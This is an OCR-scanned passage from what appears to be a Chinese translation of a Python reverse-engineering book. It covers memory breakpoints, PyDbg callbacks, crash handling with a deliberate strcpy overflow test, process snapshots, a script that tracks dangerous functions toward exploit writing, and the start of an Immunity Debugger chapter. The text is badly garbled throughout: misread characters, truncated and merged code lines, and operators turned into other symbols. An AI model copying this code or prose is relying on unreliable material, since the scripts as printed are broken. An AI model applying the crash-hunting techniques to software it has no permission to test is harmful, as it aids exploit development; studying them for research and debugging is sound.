Event Code: Thread ID: 3704 
Event Code: Thread ID: 2228 
Event Code: 1 Thread ID: 2228 

[*] Exception address: 0x7c901230 
[*] Hit the first breakpoint. 
Event Code: 4 Thread ID: 2228 
Event Code: 1 Thread ID: 3704 

[*] Hardware breakpoint removed. 


NOoOO0o00000000000000 


Listing 3-4: 义理 一 个 硬件 断 点 事件 的 顺序 


循环 执行 代码 。 现 在 我 们 的 轻 量 级 调试 器 已 经 支持 硬件 和 软件 断 点 了 ， 最 后 来 实现 
内 存 断 点 吧 。 


3.4.3 内 存 断 点 


最 后 一 个 要 实现 的 功能 是 内 存 断 点 。 大 概 流程 如 下 ;首先 查询 一 个 内 存 块 以 并 找到 基 
地 址 《页面 在 虚拟 内 存 中 的 起 始 地 址 ) 。 一 旦 确定 了 页 面 大 小 ， 接 着 就 设置 页 面 权 
限 ， 使 其 成 为 保护 (guard) 页 。 当 CPU 尝试 访问 这 块 内 存 时 ， 就 会 抛 出 一 个 
GUARD PAGE EXCEPTION 异 常 。 我 们 用 对 应 的 异常 处 理 函 数 ， 将 页 面 权限 恢 
复 到 以 前 ， 最 后 让 程序 继续 执行 。 


为 了 能 准确 的 计算 出 页 面 的 大 小 ， 就 要 向 系统 查询 信息 获得 一 个 内 存 页 的 默认 大 
小 。 这 由 GetSystemlnfo() 函 数 完成 ， 画 数 会 装填 一 个 SYSTEM INFO 结构 ， 这 
个 结构 包含 wPageSize 成 员 ， 这 就 是 操作 系统 内 存 页 默认 大 小 。 


#my_debugger . py 


class debugger(): 
def init (self): 

self.h_process = None 
self.pid = None 
self.debugger active = False 
self.h_thread = None 
self.context = None 
self.breakpoints = {} 
self.first_breakpoint= True self.hardware_breakpoints = {} 
# Here let's determine and store 
# the default page size for the system 
system info = SYSTEM INFO() 
kernel132.GetSystemInfo(byref(system info)) 
self.page size - system info.dwPageSize 


rr Bil 


已 经 获得 默认 页 大 小 ， 那 剩 下 的 就 是 查询 和 控制 页 面 的 权限 。 第 一 步 让 我 们 查询 出 
内 存 断 点 存在 于 内 存 里 的 哪 一 个 页 面 。 调 用 VirtualQueryEx() 函数 ， 将 会 填充 一 个 
MEMORY BASIC INFORMATION 结构 ， 这 个 结构 中 包含 了 页 的 信息 。 画 数 和 结 
构 定义 如 F: 


SIZE T WINAPI VirtualQuery( 


); 


HANDLE hProcess, 

LPCVOID lpAddress, 
PMEMORY BASIC INFORMATION lpBuffer, 
SIZE T dwLength 


typedef struct MEMORY BASIC INFORMATION( 


PVOID BaseAddress; 

PVOID AllocationBase; 
DWORD AllocationProtect; 
SIZE T RegionSize; 

DWORD State; 

DWORD Protect; 

DWORD Type; 


上 面 的 结构 中 BaseAddress 的 值 就 是 我 们 要 设置 权限 的 页 面 的 开始 地 址 。 接 下 来 
用 VirtualProtectEx() 设 置 权 限 ， 画 数 原 型 如 下 : 


BOOL WINAPI VirtualProtectEx( 


); 


HANDLE hProcess, 
LPVOID lpAddress, 
SIZE_T dwSize, 

DWORD flNewProtect, 
PDWORD lpflOldProtect 


让 我 们 着 手写 代码 。 我 们 将 创建 2 个 全 局 列表 ， 其 中 一 个 包含 所 有 已 经 设置 了 好 了 
的 保 扩 页， 另 一 个 包含 了 所 有 的 内 存 断 点 ， 在 处 理 GUARD PAGE EXCEPTION 
异常 的 时 候 和 将 用 得 着 。 之 后 我 们 将 在 断 点 地 址 上 ， 以 及 周围 的 区 域 设 置 权限 。 ( 因 
为 断 点 地 址 有 可 能 横 跨 2 个 页 面 ) 。 


#my_debugger . py 


class debugger(): 
def init (self): 


self.guarded pages = [] 
self.memory breakpoints = {} 


def bp set mem (self, address, size): 
mbi = MEMORY BASIC INFORMATION() 
# If our VirtualQueryEx() call doesn't return 
# a full-sized MEMORY BASIC INFORMATION 
# then return False 
if kernel32.VirtualQueryEx(self.h process, 
address, 
byref(mbi), 
sizeof(mbi)) < sizeof(mbi): 
return False 
current page = mbi.BaseAddress 
# We will set the permissions on all pages that are 
# affected by our memory breakpoint. 
while current_page <= address + size: 
# Add the page to the list; this will 
# differentiate our guarded pages from those 
# that were set by the OS or the debuggee process self 
old_protection = c_ulong(0) 
if not kernel32.VirtualProtectEx(self.h_process, 
current_page, 
size, 
mbi.Protect | PAGE_GUATF 
byref(old_protection) ) 
return False 
# Increase our range by the size of the 
# default system memory page size 
current_page += self.page_size 
# Add the memory breakpoint to our global list self.memory. 
return True 


BJE 


现在 我 们 已 经 能 够 设置 内 存 断 点 了 。 如 果 用 以 前 的 printf() 循环 作为 测试 对 象 ， 你 
将 看 到 测试 模块 只 是 简单 的 输出 Guard Page Access Detected。 不 过 有 一 件 好 
事 ， 就 是 系统 蔡 我 们 完成 了 扫尾 工作 ， 一 且 保 护 页 被 访问 ， 就 会 抛 出 一 个 异常 ， 这 
时 候 系 统 会 移 除 页 面 的 保护 属性， 然后 允许 程序 继续 执行 。 不 过 你 能 做 些 别 的 ， 在 
调试 的 循环 代码 里 ， 加 入 特定 的 处 理 过 程 ， 在 断 点 触发 的 时 候 ， 重 设 断 点 ， 读 取 断 
点 处 的 内 存 ， 喝 瓶 ' 改 力 神 ' (这 个 不 强求 ， 哈 ) ， 或 者 干 点 别 的 。 


总 结 





目前 为 止 我 们 已 经 开发 了 一 个 基于 Windows 的 轻 量 级 调试 器 。 不 仅 对 创建 调试 器 
有 了 深刻 的 领会 ， 也 学 会 了 很 多 重要 的 技术 ， 无 论 将 来 做 不 做 调试 都 非常 有 用 。 至 
少 在 用 别 的 调 试 器 的 时 候 你 能 够 明白 底层 做 了 些 什 么 ， 也 能 够 修改 调试 器 ， 让 它 更 


好 用 。 这 些 能 让 你 更 强 ! 更 强 ! 


下 一 步 是 展示 下 调试 器 的 高 级 用 法 ， 分 别 是 PyDbg 和 Immunity Debugger， 它 们 
成 熟 稳 定 而 且 都 有 基于 Windows 的 版 本 。 揭 开 PyDbg 工作 的 方式 ， 你 将 得 到 更 
多 的 有 用 的 未 西 ， 也 将 更 容易 的 深入 了 解 它 。Immunity 调试 器 结构 有 轻微 的 不 
同 ， 却 提供 了 非常 多 不 同 的 优 点 。 明 白 这 它们 实现 特定 调试 任务 的 方法 对 于 我 们 实 
现 自动 化 调试 非常 重要 。 接 下 来 轮 到 PyDbg 上 产 。 好 戏 开场 。 我 先 睡觉 ing。 


4 PyDBG---2+, PYTHON 调试 十 


话说 上 回 我 们 讲 到 如 何在 windows 下 构造 一 个 用 户 模式 的 调试 器 ， 最 后 在 大 家 的 
不 懈 努 力 下 ， 终 于 历史 性 的 完成 了 这 一 伟 大 工程 。 这 回 ， 咱 们 该 去 取 取 经 了 ， 看 看 
传说 中 的 PyDbg。 传 说 又 是 传说 ， 别 担心 ， 这 个 传说 是 真 的 ， 我 用 人 格 担保 。 
PyDbg 出 生 于 2006 年 ， 出 生地 Montreal, Quebec， 父 亲 Pedram Amini， 担 当 角 
色 : 逆向 工程 框架 PaiMei 的 核心 组 件 。 现 在 PyDbg 已 经 用 于 各 种 各 样 的 工具 之 中 
了 ， 其 中 包括 Taof (非常 流行 的 fuzzer 代理 ) ioctlizer (作者 开发 的 一 个 针对 
windwos 驱动 的 fuzzer) 。 如 此 强大 的 东西 ， 不 用 就 太 可 惜 了 (Python 的 好 你 就 
是 别人 有 的 你 也 会 有 ) 。 首先 用 它 来 扩展 下 断 点 处 理 功能 。 接 着 干 些 高 级 的 活 : 处 
理 程序 月 涡 ， 进 程 快照 还 有 将 来 Fuzz 需要 用 的 东西 。 现 在 就 开工 ， 开 工 ， 速 度 开 
I! 


4.1 扩 展 断 点 义理 


在 前 面 的 章节 中 我 们 讲解 了 用 事件 处 理 阔 数 处 理 调试 事件 的 方法 。 用 PyDbg 可 以 
RA 易 的 扩展 这 种 功能 ， 只 需要 构建 一 个 用 户 模式 的 回调 范 数 。 当 收 到 一 个 调试 事 
件 的 时 候 ， 回 调 函 数 执行 我 们 定义 的 操作 。 比 如 读 取 特 定 地 址 的 数据 ， 设 置 更 更 多 
的 断 点 ， 操 作 内 存 。 操 作 完 成 后 ， 再 将 权限 交还 给 调试 器 ， 恢 复 被 调试 的 进程 。 


PyDbg 设置 函数 的 断 点 原型 如 下 : 


bp set(address, description="", restore=True, handler=None) 


address 是 要 设置 的 断 点 的 地 址 ，description 参数 可 选 ， 受 置 唯一 
的 名 字 。 restore 决定 了 是 否 要 在 断 点 被 触发 以 后 重新 设 handler 指向 断 点 触 
发 时 候 调 用 的 回调 画 数 。 断 点 回调 画 数 只 接收 一 个 参数 ， po pydbg() 类 的 实例 化 
对 象 。 所 有 的 上 下 文 数据 ， 线 程 ， 进 程 信息 都 在 回调 画 数 被 调用 的 时 候 ， 装 填 在 这 
SAA, 
以 printf loop.py 为 测试 目标 ， 让 我 们 实现 一 个 自 定义 的 回调 函数 。 这 次 我 们 在 
printf) 函数 上 下 断 点 ， 以 便 读 取 printf() 输 出 时 用 到 的 参数 counter 变量 ， 之 后 用 一 
个 1 到 100 的 随机 数 蔡 换 这 个 变量 的 值 ， 最 后 再 打印 出 来 。 记 住 ， 我 们 是 在 目标 
进程 内 义理 ， 拷 贝 ， 操 作 这 些 实时 的 断 点 信息 。 这 非常 的 强大 ! 新 建 一 

printf random.py 文件 ， 键 和 人 下面 的 代码 。 


#printf_random. py 

from pydbg import * 

from pydbg.defines import * 

import struct 

import random 

# This is our user defined callback function 

def printf randomizer(dbg): 
4 Read in the value of the counter at ESP + 0x8 as a DWORD 
parameter addr = dbg.context.Esp + 0x8 
counter - dbg.read process memory(parameter addr,4) 
4 When we use read process memory, it returns a packed binary 
# string. We must first unpack it before we can use it further 
counter = struct.unpack("L", counter) [0] 
print "Counter: 96d" % int(counter) 
# Generate a random number and pack it into binary format 
# so that it is written correctly back into the process 
random counter - random.randint(1,100) 
random counter = struct.pack("L",random counter)[0] 
# Now swap in our random number and resume the process 
dbg.write process memory(parameter addr,random counter) 
return DBG CONTINUE 

# Instantiate the pydbg class 

dbg = pydbg() 

# Now enter the PID of the printf loop.py process 

pid - raw input("Enter the printf loop.py PID: ") 

# Attach the debugger to that process 

dbg.attach(int(pid)) 

# Set the breakpoint with the printf randomizer function 

# defined as a callback 

printf address = dbg.func resolve("msvcrt", "printf") 

dbg.bp set(printf address,description-"printf address",handler-prir 

# Resume the process 

dbg.run() 


Lp cm————— Àv)!aianÀgáÀÀ 





现在 运行 printf loop.py 和 printf random.py 两 个 文件 。 输 出 结果 将 和 表 4-1 TH 
似 。 


Table 4-1: 调 试 器 和 进程 的 输出 


Output from Debugger Output from Debugged Process 
Enter the printf loop.py PID: 3466 Loop iteration O! 
Loop iteration 1! 
Loop iteration 2! 


Loop iteration 3! 


Counter: 4 Loop iteration 32! 
Counter: 5 Loop iteration 39! 
Counter: 6 Loop iteration 86! 
Counter: 7 Loop iteration 22! 
Counter: 8 Loop iteration 70! 
Counter: 9 Loop iteration 95! 
Counter: 10 Loop iteration 60! 


为 了 不 把 你 搞 混 ， 让 我 们 看 看 printf_loop.py 代码 。 


from ctypes import * 

import time 

msvcrt = cdll.msvcrt 

counter - 0 

while 1: 
msvcrt.printf("Loop iteration %d!\n" % counter) 
time.sleep(2) 
counter += 1 


先 搞 明 白 一 点 ，printf() 接 受 的 这 个 counter ZEWME counter 的 拷贝 ， 就 是 说 在 
printf 函数 内 部 ,无 论 怎么 修改 都 不 会 影响 到 外 面 的 这 个 counter(C 语言 所 说 的 只 有 
传递 指针 才能 真 正 的 改变 值 )。 


你 应 该 看 到 ， 调 试 器 在 printf 循环 到 第 counter 变量 为 4 的 时 候 才 设置 了 断 点 。 这 

是 Al 为 被 counter 被 捕捉 到 的 时 候 已 经 为 4 了 (这 是 为 了 让 大 家 看 到 对 比 结果 ， 

不 要 认为 调试 器 (2T) 。 同 样 你 会 看 到 printf loop.py 的 输出 结果 一 直到 3 都 是 正 
常 的 。 到 4 的 时 候 ，printf() 被 中 断 ， 内 部 的 counter 被 随即 修改 为 32! 这 个 例子 很 

简单 且 强 大 ， 它 告诉 了 你 在 调试 事件 发 生 的 时 候 如 何 构建 回调 函数 完成 自 定义 的 操 
作 。 现 在 让 我 们 看 一 看 PyDbg 是 如 何 处 理应 用 程序 崩溃 的 。 


4.2 义理 访问 违例 


当 程 序 党 试 访 问 它 们 没有 权限 访问 的 页 面 的 时 候 或 者 以 一 种 不 合法 的 方式 访问 内 存 
的 时 候 ， 就 会 产生 访问 违例 。 导 致 违例 错误 的 范围 很 广 ， 从 内 存 浴 出 到 不 恰当 的 义 
理 空 指针 都 有 可 能 。 从 安全 角度 考虑 ， 每 一 个 访问 违例 都 应 该 仔细 的 审查 ， 因 为 它 
们 有 可 能 被 利用 。 


当 调 试 器 处 理 访 问 违例 的 时 候 ， To a a RIER, SF 
器 ， 以 及 引起 违例 的 指 合 。 接 着 我 们 就 能 够 用 这 些 信 息 写 一 个 利用 程序 或 者 创建 一 
个 二 进 制 的 补丁 文件 。 


PyDbg 能 够 很 方便 的 实现 一 个 违例 访问 处 理 本 数 ， ual end ai 信息 。 这 次 的 
测试 目标 就 是 危险 的 C HA strcpy() ， 我 们 用 它 创 建 一 个 会 被 浴 出 的 程序 。 接 下 
来 我 们 再 写 一 个 简短 的 PyDbg 脚本 附加 到 进程 并 处 理 违 例 。 浴 出 的 脚本 

Suc lia py， 代 码 如 下 : 


# buffer overflow.py 

from ctypes import * 

msvcrt = cdll.msvcrt 

# Give the debugger time to attach, then hit a button 
raw input("Once the debugger is attached, press any key.") 
# Create the 5-byte destination buffer 

buffer - c char p("AAAAA") 

# The overflow string 

overflow - "A" * 100 

# Run the overflow 

msvcrt.strcpy(buffer, overflow) 


问题 出 在 这 句 msvort.strcpy(buffer, overflow)， 接 受 的 应 该 是 一 个 指针 ， 而 传递 给 

函数 的 是 一 个 变量 ， 画 数 就 会 把 overflow 当 作 指针 使 用 ， 把 里 头 的 值 当 作 地 址 用 
(0x41414141414....) 。 可 惜 这 个 地 址 是 很 可 能 是 不 能 用 的 。 现 在 我 们 已 经 构造 
了 测试 案例 ， fe PKB SIT. 


# access violation handler.py 
from pydbg import * 
from pydbg.defines import * 
# Utility libraries included with PyDbg 
import utils 
# This is our access violation handler 
def check accessv(dbg): 
4 We skip first-chance exceptions 
if dbg.dbg.u.Exception.dwFirstChance: 
return DBG EXCEPTION NOT HANDLED 
crash bin - utils.crash binning.crash binning() 
crash bin.record crash(dbg) 
print crash bin.crash synopsis() 
dbg.terminate process() 
return DBG EXCEPTION NOT HANDLED 
pid - raw input("Enter the Process ID: ") 
dbg = pydbg() 
dbg.attach(int(pid)) dbg.set callback(EXCEPTION ACCESS VIOLATION,cI 
dbg.run() 





4u{T access violation handler.py 文件 ， 输 入 测试 套件 的 PID. 当 调试 器 附加 到 进程 
Din, ER 试 套件 的 终端 里 按 任何 键 ， 接 下 来 你 应 该 看 到 和 表 4-1 相似 的 输出 。 


python25. 


dll:1e071cd8 mov ecx, [eax+0x54] from thread 3376 caused ac 


EIP: 1e071cd8 mov ecx, [eax-*0x54] 

EAX: 41414141 (1094795585) -> N/A 

EBX: 00b055dO0 ( 11556304) -> QU'" B'Ox,'O )XbQ|V^"L[O«H]$6 (he: 

ECX: 0021fe90 ( 2227856) -> !$4|7|4|Q96, N! $H8| !OGGBG)OOS Vo (sta 

EDX: 00ai1dc60 ( 10607712) -> VO'wW (heap) 

EDI: 1e071cdO ( 503782608) -» N/A 

ESI: 00384220 ( 11026976) -> AAAAAAAAAAAAAAAAAAAAAAAAAAAAAA (ht 

EBP: 1ei1cf448 ( 505214024) -> enable() -> NoneEnable automa (si 

ESP: 0021fe74 ( 2227828) -> 2? BUH 7|4|@%,\!$H8|!OGGBG) (stacl 

+00: 00000000 ( 0) -> N/A 

+04: 1e063f32 ( 503725874) -> N/A 

+08: 002884220 ( 11026976) -> AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA 

+0c: 00000000 ( 0) -> N/A 

+10: 00000000 ( ©) -> N/A 

+14: 00b055cO ( 11556288) -> QFQU'" B'Ox,'O )XbQ|V "L([O-«*H]$ (he 
disasm around: 

0Ox1e071cc9 int3 

0Ox1e071cca int3 

0x1e071ccb int3 

Ox1e071ccc int3 

Ox1e071ccd int3 

Ox1e071cce int3 

0x1e071ccf int3 

Ox1e071cdO push esi 

0x1e071cd1 mov esi, [esp+0x8] 


SEH 


Ox1e071cd5 
0x1e071cd8 
0x1e071cdb 
0x1e071cde 
0x1e071ce0 
0x1e071ce6 
0x1e071ce8 
0x1e071cea 
0x1e071ceb 
0x1e071ced 
0x1e071cf0 
0x1e071cf2 
unwind: 


mov eax, [esi+0x4] 
mov ecx, [eax+0x54] 
test ch, 0x40 

jz 0x1e0741cff 

mov eax, [eaxt+0xaé4 | 
test eax, eax 

jz 0x1e071cf4 

push esi 

call eax 

add esp, 0x4 

test eax, eax 

jz Oxie071icff 


0021ffeO -> python.exe:1d00136c jmp [0x1d002040] 


ffffffff -> kernel32.d11:7c839aa8 push ebp 
ee ee, 
Listing 4-1 : PyDbg 捕捉 到 的 奔 溃 信 息 





输出 了 很 多 有 用 的 信息 片断 。 第 一 个 部 分 指出 了 那个 指令 引发 了 访问 异常 以 及 指 兮 
在 哪 个 块 里 。 这 个 信息 可 以 帮助 你 写 出 漏洞 利用 程序 或 者 用 静态 分 析 工 具 分 析 问 
题 出 在 哪里 。 第 二 部 分 转 储 出 了 所 有 寄存 器 的 值 ， 特 别 有 趣 的 是 ， 我 们 将 EAX Æ 
HX T 0x41414141 (0x41 EAE A 的 的 十 六 进 制 表 示 ) 。 同 祥 ， 我 们 看 到 ESI! 


指向 了 一 个 由 A 组 成 的 字符 串 。 和 ESP+08 指向 同一 个 地 方 。 第 三 部 分 是 在 故障 
PR sh 最 后 一 块 是 奔 溃 发 生 时 候 注册 的 结构 化 异常 处 理 程序 
的 列表 。 


用 PyDbg 构建 一 个 奔 溃 义理 程序 就 是 这 么 简单 。 不 仅 能 够 自动 化 的 义理 崩溃 ， 还 
能 在 在 事后 剖析 进程 发 生 的 一 切 。 下 节 ， 我 们 用 PyDbg 的 进程 内 部 快照 功能 创建 
一 个 进 程 rewinder。 


进程 快照 


PyDbg 提供 了 一 个 非常 酷 的 功能 ， 进 程 快照 。 使 用 进程 快照 的 时 候 ， 我 们 就 能 够 冰 
冻 进 程 ， 获 取 进 程 的 内 存 数 据 。 以 后 我 们 想 要 让 进程 回 到 这 个 时 刻 的 状态 ， 只 要 使 
用 这 个 时 刻 的 快照 就 行 了 。 


4.3.1 获得 进程 快照 


第 一 步 ,在 一 个 准确 的 时 间 获 得 一 份 目标 进程 的 精确 快照 。 为 了 使 得 快照 足够 精确 ， 
需 要 得 到 所 有 线程 以 及 CPU EFX, ~ THAI 将 这 些 数据 存储 起 
来 ， 下 次 我 们 需要 恢复 快照 的 时 候 就 能 用 的 到 


为 了 防止 在 获取 快照 的 时 候 ， 进 程 的 数据 或 者 状态 被 修改 ， 需 要 将 进程 挂 起 来 ， 
个 任 务 由 suspend all threads() 完 成 。 挂 起 进程 之 后 ， 可 以 用 
process_snapshot() 获 取 快 照 。 快 照 完 成 之 后 ， 用 resume all threads() 恢 复 挂 起 
的 进程 ， 让 程序 继续 执行 。 当 某 个 时 刻 我 们 需要 将 进程 恢复 到 从 前 的 状态 ， 简 单 的 
process_restore() 就 行 了 。 这 看 起 来 是 不 是 太 简 单 了 ? 


现在 新 建 个 snapshot.py 试验 下 ， 代 码 的 功 和 a el a 
快照 ， 输 入 "restore" 的 时 候 闻 进程 恢复 到 快照 时 的 状态 


#snapshot .py 
from pydbg import * 
from pydbg.defines import * 
import threading 
import time 
import sys 
class snapshotter(object): 
def init (self,exe_path): 
self.exe_path = exe_path 
self.pid = None 
self.dbg = None 
self.running = True 
# Start the debugger thread, and loop until it sets the PII 
# of our target process 
pydbg thread = threading. Thread(target=self.start_debugger 
pydbg_thread.start() 
while self.pid == None: 
time.sleep(1) 
# We now have a PID and the target is running; let's get a 
# second thread running to do the snapshots 
monitor thread = threading. Thread(target=self .monitor_debuc 
monitor_thread.start() 
def monitor_debugger(self): 
while self.running == True: 
input = raw_input("Enter: 'snap','restore' or 'quit'") 
input = input.lower().strip() 
if input == "quit": 
print "[*] Exiting the snapshotter." 
self.running = False self.dbg.terminate process() 
elif input -- "snap": 
print "[*] Suspending all threads." self.dbg.susper 
print "[*] Obtaining snapshot." 
self.dbg.process snapshot() 
print "[*] Resuming operation." 
self.dbg.resume all threads() 
elif input -- "restore": 
print "[*] Suspending all threads." self.dbg.susper 
print "[*] Restoring snapshot." 
self.dbg.process restore() 
print "[*] Resuming operation." 
self.dbg.resume all threads() 
def start debugger(self): self.dbg - pydbg() 
pid = self.dbg.load(self.exe path) 
self.pid - self.dbg.pid 
self.dbg.run() 
exe path = "C:\\WINDOWS\\System32\\calc.exe" 
snapshotter(exe path) 


4 Say 








那么 第 一 步 就 是 在 调试 器 内 部 创建 一 个 新 线程 ， 并 用 此 启动 目标 进程 。 通 过 使 用 分 
开 的 线程 ， 就 能 将 被 调试 的 进程 和 调试 器 的 操作 分 开 ， 这 样 我 们 输入 不 同 的 快照 命 
今 进行 操作 的 时 候 ， 就 不 用 强迫 被 调试 进程 暂停 。 当 创建 新 线程 的 代码 返回 了 有 效 
的 PID， 我 们 就 创建 另 一 个 线程 ， 接 受 我 们 输入 的 调试 命令 。 之 后 这 个 线程 根据 我 
们 输入 的 命令 决定 不 同 的 操作 (IR 照 ， 恢 复 快 照 ， 结 束 程 序 ) 。 


我 们 之 所 以 选择 计算 器 作为 例子 ， 是 因为 通过 操作 图 形 界面 ， 可 以 更 清晰 的 看 到 ， 


后 再 在 计算 器 里 进行 别 的 操作 。 最 后 就 当 的 输入 "restore"， 你 将 看 到 ， 计 算 器 回 到 
了 最 初时 快照 的 状态 。 使 用 这 种 方法 我 们 能 够 将 进程 恢复 到 任意 我 们 希望 的 状态 。 


现在 让 我 们 将 所 有 的 新 学 的 PyDbg 知识 ， 创 建 一 个 fuzz 辅助 工具 ， 帮 助 我 们 找到 
软件 BS, JEFE A ABER RE, 


4.3.2 组 合 代 三 


我 们 已 经 介绍 了 一 些 PyDbg 非常 有 用 的 功能 ， 接 下 来 要 构建 一 个 工具 用 来 根除 应 
用 程 序 中 出 现 的 可 利用 的 漏洞 。 在 我 们 平常 的 开发 过 程 中 ， 有 些 函 数 是 非常 危险 
的 ， 很 容易 造成 缓冲 区 渝 出 ， 字 符 串 问题 ， 以 及 内 存 出 错 ， 对 这 些 画 数 需 要 重点 关 
注 。 

工具 将 定位 于 危险 函数 ， 并 跟踪 它们 的 调用 。 当 我 们 认为 妙 数 被 危险 调用 了 ， 就 将 
4 堆栈 中 的 4 个 参数 接触 引用 ， 弹 出 栈 ， 并 且 在 函数 产生 渝 出 之 前 对 进程 快照 。 如 
果 这 次 访问 违例 了 ， 我 们 的 脚本 将 把 进程 恢复 到 ， 画 数 被 调用 之 前 的 快照 。 并 从 这 
开始 ， 单 步 执 行 ， 同时 反 汇 编 每 个 执行 的 代码 ， 赴 到 我 们 也 抛 出 了 访 
问 违例 ， 或 者 执行 完了 MAX_INSTRUCTIONS (我 们 要 监视 的 代码 数量 ) 。 
无 论 什 么 时 候 当 你 看 到 一 个 危险 的 函数 在 处 理 你 输入 的 数据 的 时 候 ， 尝 试 操 作 数 据 
crash 数据 都 似乎 值得 。 这 是 创造 出 我 们 的 漏洞 利用 程序 的 第 一 步 。 


开动 代码 ， 建 立 danger track.py， 输 入 下 面 的 代码 。 


#danger_track.py 

from pydbg import * 

from pydbg.defines import * 

import utils 

# This is the maximum number of instructions we will log 

# after an access violation MAX_INSTRUCTIONS = 10 

# This is far from an exhaustive list; add more for bonus points dé 


"strcpy" : "msvcrt.dll", 
"strncpy" : "msvcrt.dll", 
"sprintf" : "msvcrt.dll", "vsprintf": emsver b dis 


} 

dangerous_functions_resolved = {} 

crash_encountered = False 

instruction count = 0 

def danger handler(dbg): 
4 We want to print out the contents of the stack; that's about 
# Generally there are only going to be a few parameters, so we 
4 take everything from ESP to ESP+20, which should give us enot 
# information to determine if we own any of the data esp offsel 


print "[*] Hit %s" % dangerous functions resolved[dbg.context.t 


while esp offset «- 20: 
parameter = dbg.smart dereference(dbg.context.Esp + esp ofl 
print "[ESP + %d] => 96s" % (esp offset, parameter) 
esp offset += 4 


dbg.suspend all threads() 
dbg.process snapshot() 
dbg.resume all threads() 
return DBG CONTINUE 
def access violation handler(dbg): 
global crash encountered 
# Something bad happened, which means something good happened 
# Let's handle the access violation and then restore the proce: 
4 back to the last dangerous function that was called 
if dbg.dbg.u.Exception.dwFirstChance: 
return DBG EXCEPTION NOT HANDLED 
crash bin - utils.crash binning.crash binning() 
crash bin.record crash(dbg) 
print crash bin.crash synopsis() 
if crash encountered -- False: 
dbg.suspend all threads() 
dbg.process restore() 
crash encountered - True 
# We flag each thread to single step 
for thread id in dbg.enumerate threads(): 
print "[*] Setting single step for thread: 0x%08x" % tl 
h thread - dbg.open thread(thread id) 
dbg.single step(True, h thread) 
dbg.close handle(h thread) 
# Now resume execution, which will pass control to our 
# single step handler 
dbg.resume all threads() 
return DBG CONTINUE 
else: 
dbg.terminate process() 
return DBG EXCEPTION NOT HANDLED 
def single step handler(dbg): 
global instruction count 
global crash encountered 
if crash encountered: 
if instruction count -- MAX INSTRUCTIONS: 
dbg.single step(False) 
return DBG CONTINUE 
else: 
4 Disassemble this instruction 
instruction - dbg.disasm(dbg.context.Eip) 
print "#%d\tOx%08x : 96s" % (instruction count,dbg.cont: 
instruction count += 1 
dbg.single step(True) 
return DBG CONTINUE 
dbg = pydbg() 


pid - int(raw input("Enter the PID you wish to monitor: ")) 
dbg.attach(pid) 
# Track down all of the dangerous functions and set breakpoints 
for func in dangerous functions.keys(): 
func address = dbg.func resolve( dangerous functions[func], func 
print "[*] Resolved breakpoint: %s -> 0x%08x" % ( func, func a 
dbg.bp set( func address, handler - danger handler ) 
dangerous functions resolved[func address] - func 
dbg.set callback( EXCEPTION ACCESS VIOLATION, access violation hant 
dbg.set callback( EXCEPTION SINGLE STEP, single step handler ) 
dbg.run() 


‘ mum] 








通过 之 前 对 PyDbg 的 诸多 讲解 ， 这 段 代 码 应 该 看 起 来 不 那么 难 了 吧 。 测 斌 这 个 脚 
本 的 最 好 方法 ， 就 是 运行 一 个 有 漏洞 价格 的 程序 ， 然 后 让 脚本 附加 到 进程 ， 和 程序 
交互 ， 党 试 crash 程序 。 


我 们 已 经 对 PyDbg 有 了 一 定 的 了 解 ， 不 过 这 只 是 它 强 大 功能 的 一 部 分 ， 还 有 更 多 
的 东 西 ， 需 要 你 自己 去 挖掘 。 再 好 的 东西 也 满足 不 了 那些 "懒惰 "的 hacker, PyDbg 
固然 强大 ， 方 便 的 扩展 ， 自 动 化 调试 。 不 过 每 次 要 完成 任务 的 时 候 ， 都 要 自己 动手 
编写 代码 。 接 下 来 介绍 的 Immunity Debugger 弥补 了 这 点 ， 完 美的 结合 了 图 形 化 
调试 和 脚本 调试 。 它 能 让 你 更 懒 ， 哈 。 让 我 们 继续 。 


5 IMMUNITY---- 最 好 的 调试 器 


到 目前 为 止 我 们 已 经 创建 了 自己 的 调试 器 ， 还 学 会 了 对 PyDbg 的 使 用 。 是 时 候 研 
究 下 IMMUNITY 了 。IMMUNITY 除了 拥有 完整 的 用 户 界 面 外 ， 还 拥有 强大 的 
Python 库 ， 使 得 它 处 理 漏洞 挖掘 ，exploit 开发 ， 病 毒 分 析 之 类 的 工作 变 得 非常 简 
单 。 lImmunity 很 好 的 结合 了 动态 调试 和 静态 分 析 。 还 有 纯 Python 图 形 算法 实现 
的 绘图 男 数 。 接 下 来 让 我 们 深入 学 习 Immunity 的 使 用 ， 进 一 步 的 研究 exploit HA 
发 和 病毒 调试 中 的 bypass 技术 。 


5.1 安装 Immunity 调试 器 


Immunity 调试 器 提供 了 自由 发 行 的 版 本 ， 可 以 由 hitp://debugger.immunityinc.com/ 
FR PR 后 的 可 执行 程序 包含 了 ， 依 赖 的 文件 ， 包 括 python2.5。 网 速 不 行 的 同 
学 下 载 国内 的 修 改版 。 


5.2 Immunity Debugger 101 


在 研究 强大 的 immlib 库 之 前 ， 先 看 下 Immunity 的 界面 。 


Immunity Debugger (CPL) 


I= TH ax rm UMS He} 1emtwhcPkbzr.s 
isters IFAN 


«| Feo 








Irmunty Debugge v1 73: MOAR BUGS. * Need suppot? vist hip: horum mmunttc con * 
图 5-1:Immunity 调试 器 主 界面 


调试 器 界面 被 分 成 5 个 主要 的 块 。 左 上 角 是 CPU 窗口 ， 显 示 了 正在 处 理 的 代码 的 
BL 编 指令 。 右 上 角 是 寄存 器 窗口 ， 显 示 所 有 通用 寄存 器 。 左 下 角 是 内 存 窗 口 ， 以 
十 六 进 制 的 形 式 显 示 任 何 被 选中 的 内 存 快 。 右 下 角 是 堆栈 窗口 ， 显 示 调 用 的 堆栈 和 
解码 后 的 函数 参数 (任何 原生 的 API 调用 ) 。 最 底下 和 白色 的 窗口 是 命令 栏 ， 你 能 够 
像 WindDbg 一 样 使 用 命 命 控制 调 斌 器， 或 者 执行 PyCommands。 


5.2.1 PyCommands 


f£ Immunity 中 执行 Python 的 方法 即使 用 PyCommands, PyCommands 就 是 一 个 
个 python 脚本 文件 ， 存 放 在 Immunity 安装 目录 的 PyCommands 文件 夹 里 。 每 个 
python 脚本 都 执行 一 个 任务 (hooking, ADEE) ， 相 当 于 一 个 
PyCommand, 每 个 PyCommand 都 有 一 个 特定 的 结构 。 以 下 就 是 一 个 基础 的 模 
型 : 


from immlib import * 

def main(args): 
4 Instantiate a immlib.Debugger instance 
imm = Debugger() 
return "[*] PyCommand Executed!" 


PyCommand 有 两 个 必 备 条 件 。 一 个 main) K, RiIK— 83€ (由 所 有 参数 组 
